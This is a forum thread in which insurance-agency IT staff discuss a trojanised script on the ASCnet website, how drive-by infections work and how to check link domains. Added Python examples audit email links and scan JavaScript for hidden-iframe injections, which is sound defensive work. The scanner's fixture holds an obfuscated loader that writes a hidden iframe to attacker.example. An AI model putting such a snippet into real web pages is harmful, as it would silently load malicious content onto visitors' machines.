Warning! The ASCnet site may be infected with a virus.

Started by Ben Thoele, February 18, 2013, 11:32:32 AM


Ben Thoele

Sophos AV kicks out the following warning when I visit the ASCnet site.

   Virus/spyware 'Troj/Iframe-JG' has been detected at "www.ascnet.org/AM/HierMenu/HM_ScriptDOM.js"
     
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Ben Thoele

Sophos Labs confirmed that ASCnet.org is infected with Troj/Iframe-JG.

Aaron over at ASCnet is working with their web hosting provider to get it resolved.  He said he would email me when it's fixed.   I will follow-up when I hear from him.
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Charlie Charbonneau

Yikes!   Is that the free stuff you get with membership?!
Charlie Charbonneau
GBMB Insurance
San Antonio TX.

EPIC 2022, CSR24, Windows 2012 Hyper-V & 2016, Win10/11 Pro Stations, Sophos Anti-Virus.

DebAmstutz

Here are a couple of questions from someone not well-versed on the topic of viruses.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any viruses on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.
Deb Amstutz
Missing TAM 5 days a week

Jim Jensen

Deb, lots of websites have malicious software that has become embedded in them. A lot of sites run small programs (scripts) in order to make them look nice or have certain functionalities. Some use Java, while others use Flash. These scripts run on your computer. This is why you've seen the warnings about issues with Java and that you need to either disable it, or apply a patch (when they are available). If someone infiltrates a website and leaves behind malicious coding, it can run on yours just by going to the website. Email is only one way to obtain a nasty on your computer.
Jim Jensen
CIC, CEO, CIO, COO, CFO, Producer, CSR, Claims Handler, janitor....whatever else.
Jensen Ford Insurance
Indianapolis

Ben Thoele

Quote from: DebAmstutz on February 18, 2013, 12:37:26 PM
Here are a couple of questions from someone not well-versed on the topic of viruses.

How does a site like that (or any) become infected?

How would it get passed to me if I visit the site?

I delete email when I do not recognize the sender, and as far as I know, I've not had any viruses on my workstation.  Seems like everyone else in the office has had to be "disinfected" but not me.

Here is a great YouTube video I showed our staff to help understand this.
http://www.youtube.com/watch?v=EK6BBYmiVpo&feature=share&list=PL4E9816850A80ED8E

I wouldn't visit ASCnet, for now, unless you are prepared to reload your computer.  And that's the rule of thumb I use for all internet browsing at work.  Is the site "work related," and/or am I willing to deal with the repercussions?  Since there is no 100% safe web surfing I advise users to browse based on a cost/benefit analysis.   Is the site I'm going to worth the potential risk to my work computer?  If a user is infected from a vacation site, then they are in trouble.  If they get a virus from Travelers.com then they are O.K. because that's a cost of doing business.    Hopefully you're not paying to rebuild computers so your employees can plan their vacations at work.


Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Marie (Zionkowski) Gozikowski

Ben - what a great link... thanks for posting it!  I am going to have my users watch them all :-)
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Lynne Desrochers

Hey, how do we know that link is safe?  : )
Lynne Desrochers

Ben Thoele

Quote from: Lynne Desrochers on February 18, 2013, 01:17:07 PM
Hey, how do we know that link is safe?  : )
Good question.  I look at the domain; in this case it's www.youtube.com, which I trust.  If I receive an Insurance Marketing email and the link points to www.hellspawn.com I don't click on it.  If you can't see the link you can "mouse over" or hover over the link to see where it points.  This way you can inspect the link before you click on it.  An email from Travelers.com should include links to www.Travelers.com/whatever, not to www.russianmalwarehost.com/virus or whatever.

Does that help? 
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN
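The "hover and compare domains" check above can be automated for the links in an HTML email. The following is an added example (not code from the thread or from any vendor): it pulls every anchor out of a constructed sample message, compares the domain the visible text shows against the domain the href actually points to, and flags mismatches, including the lookalike "trusted.com.attacker.example" trick. The sample message, and the attacker.example / phish.example hosts, are made up for illustration.

```python
"""Flag HTML email links whose visible text names one domain but whose href goes elsewhere."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message, not a real email: one honest link, two deceptive ones,
# and one whose text is plain words (needs a human look at the target).
SAMPLE_EMAIL_HTML = """
<p>Your policy documents are ready.</p>
<p><a href="https://www.travelers.com/claims">www.travelers.com/claims</a></p>
<p><a href="http://www.russianmalwarehost.com/virus">www.Travelers.com/login</a></p>
<p><a href="https://www.youtube.com/watch?v=EK6BBYmiVpo">Watch the video</a></p>
<p><a href="http://www.travelers.com.phish.example/login">www.travelers.com</a></p>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    parser.close()
    return parser.links


def host_of(s):
    """Lowercase host of a URL or bare 'host/path' string; None if it does not look like one."""
    s = s.strip()
    if not s or " " in s or "." not in s:
        return None
    if "://" not in s:
        s = "http://" + s          # bare "www.example.com/path" as people write it in email text
    host = urlparse(s).hostname
    return host.lower() if host else None


def base_domain(host):
    """Crude registrable domain: last two labels (fine for .com-style names, not for co.uk)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def audit_links(html):
    """Return one finding per link: ok, mismatch, check (text is not a host), or unparseable."""
    findings = []
    for href, text in extract_links(html):
        target = host_of(href)
        shown = host_of(text)
        if target is None:
            status = "unparseable"
        elif shown is None:
            status = "check"          # "Watch the video": nothing to compare, read the target host
        elif base_domain(shown) == base_domain(target):
            status = "ok"
        else:
            status = "mismatch"       # text says one domain, link goes to another
        findings.append({"href": href, "text": text, "target_host": target, "status": status})
    return findings


if __name__ == "__main__":
    for f in audit_links(SAMPLE_EMAIL_HTML):
        print(f"{f['status']:<11} shown={f['text']!r:<32} target={f['target_host']}")
```

Note the base-domain comparison is deliberately crude: it treats `www.travelers.com` and `travelers.com` as the same site, but it has no public-suffix list, so a two-label country TLD like `co.uk` would be compared incorrectly. For a mail gateway you would swap in a real public-suffix library.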

Marie (Zionkowski) Gozikowski

I have Youtube blocked at work, but it looks like you can also view these videos directly from Sophos' site:

http://www.sophos.com/en-us/security-news-trends/anatomy-of-an-attack.aspx
Marie (Zionkowski) Gozikowski
Iddings Insurance Agency
Wyalusing, PA
WinTAM 11.1    SBS 2003 
8 users

Ben Thoele

Looks like the ASCnet site is fixed for now.  At least they made a change and when I go there it doesn't set off our AV. 

Surf at your own risk!
Ben Thoele, I.T. Coordinator
TAM 12.2
33 Users
Mahowald Insurance
Saint Cloud, MN

Bloody Jack Kidd

It can happen to many sites, although often enough the malicious content is actually served from a site other than the one you are visiting. In this case it could be a few things, like Sophos getting a bit too paranoid, in which case the JavaScript in question may not be as dangerous as this makes it appear.

Another possibility is that the site has been compromised and malicious code has been planted there.

I would point a finger and snicker, but this can and does happen to even the most well-run and secure sites. In fact, recently Bit9, a company on the bleeding edge of application whitelisting, got hacked and delivered malware out to their own clients.
Sysadmin - Parallel42

Gene Foraker

I don't know how the message board got a virus, but don't forget that there is a "files" area where you can download files.   There may have been something there.
Gene Foraker CPCU
Gates-Foraker Insurance Agency
Norton, OH


My posts are a natural hand made product. The slight variations in spelling and grammar enhance its individual character and beauty and in no way are to be considered flaws or defects.

Mark

Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.
Mark Piontek, MBA
Director of Information Systems
BS in Information Systems Security

Bloody Jack Kidd

Quote from: Mark on February 19, 2013, 11:00:53 AM
Interesting.  So, the .js file was probably compromised?  I looked at that file and realized that I don't read JavaScript files, but it looked like it was trying to determine what type of browser you were using.

browser / platform id is a very common javascript trick - nothing malicious about that in and of itself - but malicious sites looking to exploit a system will often first determine what you are running and then deliver the appropriate payload.
Sysadmin - Parallel42
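Jim's point that planted script runs the moment you load the page, and Bloody Jack's point that browser detection is harmless by itself but is what an injection uses to pick its payload, can both be seen in a quick static check. The following is an added example, not code from the thread and not the real HM_ScriptDOM.js: it scans a JavaScript file for the signature shape of an iframe injection (a 1x1 or CSS-hidden iframe, written with document.write, pointing off-site, often wrapped in unescape()), while reporting user-agent checks separately as context rather than as a verdict. Both JS samples are constructed for illustration, and attacker.example is a made-up host.

```python
"""Static check of a JavaScript file for injected hidden-iframe loaders."""
import re
from urllib.parse import unquote, urlparse

# Constructed stand-in for a menu script's own browser detection (not the real HM_ScriptDOM.js).
# Looking at navigator.userAgent is ordinary library code and is not flagged on its own.
BENIGN_JS = r"""
var ua = navigator.userAgent.toLowerCase();
var isIE = ua.indexOf("msie") != -1;
var isNS = !isIE && ua.indexOf("mozilla") != -1;
function HM_f_StartIt() { if (isIE) { /* IE menu path */ } }
"""

# Same script with a constructed injection appended: fingerprint first, then drop a 1x1 hidden
# iframe via document.write, with the tag %XX-encoded so a grep for "<iframe" misses it.
INJECTED_JS = BENIGN_JS + r"""
if (navigator.userAgent.indexOf("MSIE") != -1) {
document.write(unescape('%3Ciframe%20src%3D%22http%3A//attacker.example/in.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));
}
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
TINY_RE = re.compile(r"\b(width|height)\s*=\s*['\"]?\s*[01]\b", re.IGNORECASE)
HIDDEN_RE = re.compile(r"(visibility\s*:\s*hidden|display\s*:\s*none)", re.IGNORECASE)
SRC_RE = re.compile(r"src\s*=\s*['\"]?\s*(https?://[^'\"\s>]+)", re.IGNORECASE)
UA_RE = re.compile(r"navigator\.(userAgent|platform|appName|appVersion)")


def deobfuscate(js):
    """Undo the cheap encodings injections lean on: %XX (unescape), \\xNN and \\uNNNN escapes."""
    text = unquote(js)
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return text


def scan_js(js, site_host):
    """Return suspicious iframes (with reasons) and a count of browser-fingerprinting calls.

    site_host is the host the script was served from; an iframe src on any other host
    is reported as off-site. The user-agent count is context only, not a malice signal.
    """
    text = deobfuscate(js)
    iframes = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        reasons = []
        if TINY_RE.search(tag):
            reasons.append("1px/0px dimensions")
        if HIDDEN_RE.search(tag):
            reasons.append("hidden via CSS")
        src = SRC_RE.search(tag)
        if src and urlparse(src.group(1)).hostname != site_host:
            reasons.append("off-site src " + src.group(1))
        if "document.write" in text[max(0, m.start() - 200):m.start()]:
            reasons.append("written by document.write")
        if reasons:
            iframes.append({"iframe": tag, "reasons": reasons})
    return {"iframes": iframes, "ua_checks": len(UA_RE.findall(text))}


if __name__ == "__main__":
    for name, js in (("benign", BENIGN_JS), ("injected", INJECTED_JS)):
        result = scan_js(js, "www.ascnet.org")
        print(name, "ua_checks=%d" % result["ua_checks"])
        for f in result["iframes"]:
            print("  suspicious iframe:", "; ".join(f["reasons"]))
```

Run against a file you have already downloaded (with curl or wget, never in a browser) from a machine you do not mind reimaging. Expect false positives: legitimate analytics and ad code also writes 1x1 iframes and pixels, so treat a hit as "open this file and read it", exactly as Mark did, not as proof of compromise. The reverse also holds: an injection that builds its tag character by character or fetches a second-stage script with no iframe at all will sail past these four regexes, which is why the AV vendor's verdict and a diff against a known-good copy of the file are the checks to trust.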